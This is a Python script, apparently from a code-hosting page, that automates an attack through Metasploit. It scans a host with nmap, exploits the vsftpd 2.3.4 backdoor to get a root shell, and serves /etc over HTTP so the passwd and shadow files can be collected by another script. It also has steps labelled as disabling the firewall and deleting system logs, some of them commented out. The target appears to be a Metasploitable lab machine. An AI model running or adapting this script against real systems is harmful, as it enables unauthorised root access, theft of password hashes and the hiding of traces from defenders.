/
PyScript.py
54 lines (50 loc) · 1.65 KB
/
PyScript.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole
import os
import sys
import string
import time
#connecting to metasploit server
#make sure msdb and postgresql are up
os.system("nmap -v -n -p- 192.168.1.24 > /home/PortsAndPortTypes.txt")
os.system("gnome-terminal -e 'msfrpcd -P abc123 -f -a 127.0.0.1'")
#sleep needed to allow metasploit server to set up
time.sleep(10)
client = MsfRpcClient('abc123', ssl=True, port='55553')
console = MsfRpcConsole(client)
#setting up the use of the exploit and payload
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '192.168.1.24'
exploit['VERBOSE'] = True
exploit.execute(payload='cmd/unix/interact')
#sleep needed to allow session(1) (root) to connect to LHOST
time.sleep(15)
#writing the shell commands in root
shell = client.sessions.session(1)
#disabling security
print "Disabling security...\n"
#shell.write("sudo ufw disable\n")
print "Copying the password file...\n"
print "Copying the shadow password file...\n"
print "Copying port numbers and port types...\n"
time.sleep(30)
#hosting the metasploitable as a server
shell.write("cd /etc\n")
shell.write("python -m SimpleHTTPServer 55555\n")
print("Turning on server...\n")
time.sleep(10)
execfile("ReceiveData.py")
#enabling security
print "\nEnabling security...\n"
#shell.write("sudo ufw enable\n")
print "Deleting system logs...\n"
#shell.write("sudo rm /etc/syslog.conf\n")
print "Exiting session...\n"
shell.write("exit\n")
print "Killing all job processes...\n"
shell.write("jobs -K\n")
shell.write("exit\n")
shell.write("logout\n")
shell.write("^C\n")
shell.read()
print "Exploit complete\n"